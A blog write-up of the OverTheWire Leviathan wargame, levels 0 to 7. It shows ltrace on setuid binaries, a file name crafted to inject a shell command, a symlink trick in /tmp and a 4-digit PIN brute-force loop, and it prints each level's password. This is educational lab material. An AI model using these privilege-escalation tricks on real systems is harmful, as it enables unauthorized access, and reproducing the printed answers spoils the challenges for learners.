It’s been a while since I’ve had a decent post. Life happened and I’ve started the transition into a new job with an awesome company. I wanted to post something though, even if it’s going to be a short one.

I’m going to start with some write up’s of the OverTheWire wargames starting with Leviathan. If you haven’t done any of these yet, I suggest you do. I also suggest, that if you are new to the whole linux things, you start with Bandit as it is a great primer.

So. Let’s do this!

Leviathan 0 -> 1

So, first thing we see is a .backup directory containing a bookmarks.html file.

leviathan0@melinda:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
leviathan0@melinda:~$ cd .backup/
leviathan0@melinda:~/.backup$ ls -al
total 140
drwxr-x--- 2 leviathan1 leviathan0   4096 Aug  8 23:10 .
drwxr-xr-x 3 root       root         4096 Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 133259 Nov 14  2014 bookmarks.html

Checking the file for any passwords gives us the Leviathan1 password.

leviathan0@melinda:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for 
leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to 
leviathan1</A>

Leviathan 1 -> 2

This one is slightly more complicated. We have a check ELF that asks us for a password and then exits. Luckily ltrace is installed, we can easily see that it’s looking for sex as the password.

leviathan1@melinda:~$ ls -al
total 28
drwxr-xr-x   2 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7493 Nov 14  2014 check
leviathan1@melinda:~$ ./check
password: pas
Wrong password, Good Bye ...
leviathan1@melinda:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7b4, 0x80485f0 <unfinished ...>
printf("password: ")                                                         = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: pas
)                                 = 112
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 97
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 115
strcmp("pas", "sex")                                                         = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                         = 29
+++ exited (status 0) +++
leviathan1@melinda:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan 2 -> 3

I have a love/hate relationship with this one. It’s another ELF that prints the contents of whatever file you feed it assuming the current user has permissions. Problem is…I don’t have permissions to the file I want to print.

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Using ltrace again, we can see it’s using access() to check if we have permissions and then calling cat on the file.

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ltrace ~/printfile test
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("test", 4)                                                            = 0
snprintf("/bin/cat test", 511, "/bin/cat %s", "test")                        = 13
system("/bin/cat test" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 0
+++ exited (status 0) +++

I tried a few things using file names and confirmed the EUID is leviathan3. Another quick change to the file name and BAM! we got our password

leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ id
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ bash
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ id
/bin/cat: test: Permission denied
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test;\;\ bash
/bin/cat: test: Permission denied
-bash: ; bash: command not found
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ bash
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ exit
exit
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ touch test\;\ sh
leviathan2@melinda:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ sh
/bin/cat: test: Permission denied
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan 3 -> 4

This one is the same as level 2, just using ltrace to see the password.

leviathan3@melinda:~$ ./level3
Enter the password> pas
bzzzzzzzzap. WRONG
leviathan3@melinda:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                   = -1
printf("Enter the password> ")                                               = 20
fgets(Enter the password> pass
"pass\n", 256, 0xf7fcac20)                                             = 0xffffd5ac
strcmp("pass\n", "snlprintf\n")                                              = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                   = 19
+++ exited (status 0) +++
leviathan3@melinda:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Leviathan 4 -> 5

Again, another easy one. A ELF hidden in a .trash directory that spat out some binary. Using Perl, I translated it back to ASCII and got our password for leviathan 5.

leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
leviathan4@melinda:~/.trash$ ./bin | perl -lape '$_=pack("(B8)*",@F'
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
leviathan4@melinda:~/.trash$ ./bin | perl -lape '$_=pack"(B8)*",@F'
Tith4cokei

Leviathan 5 -> 6

Tricky, but not to difficult. The ELF simply prints out the contents of file.log so I just created a symbolic link between file.log and our password file.

leviathan5@melinda:~$ ./leviathan5
Cannot find /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                            = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
leviathan5@melinda:~$ touch /tmp/file.log
leviathan5@melinda:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0x804b008
fgetc(0x804b008)                                                             = '\377'
feof(0x804b008)                                                              = 1
fclose(0x804b008)                                                            = 0
getuid()                                                                     = 12005
setuid(12005)                                                                = 0
unlink("/tmp/file.log")                                                      = 0
+++ exited (status 0) +++
leviathan5@melinda:~$ echo test > /tmp/file.log
leviathan5@melinda:~$ ./leviathan5
test
leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log; ./leviathan5
UgaoFee4li

Leviathan 6 -> 7

So we have an ELF that asks for a 4 digit pin, ltrace didn’t help us.

leviathan6@melinda:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
leviathan6@melinda:~$ ./leviathan6 5555
Wrong
leviathan6@melinda:~$ ltrace ./leviathan6 6666
__libc_start_main(0x804850d, 2, 0xffffd7a4, 0x8048590 <unfinished ...>
atoi(0xffffd8d0, 0xffffd7a4, 0xffffd7b0, 0xf7e5619d)                         = 6666
puts("Wrong"Wrong
)                                                                = 6
+++ exited (status 6) +++

It’s only a 4 digit pin, so a little bash magic and we can brute force it.

for i in {0..9}{0..9}{0..9}{0..9}; do ./leviathan6 $i; done
...
Wrong
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Leviathan 7 -> 8

leviathan7@melinda:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.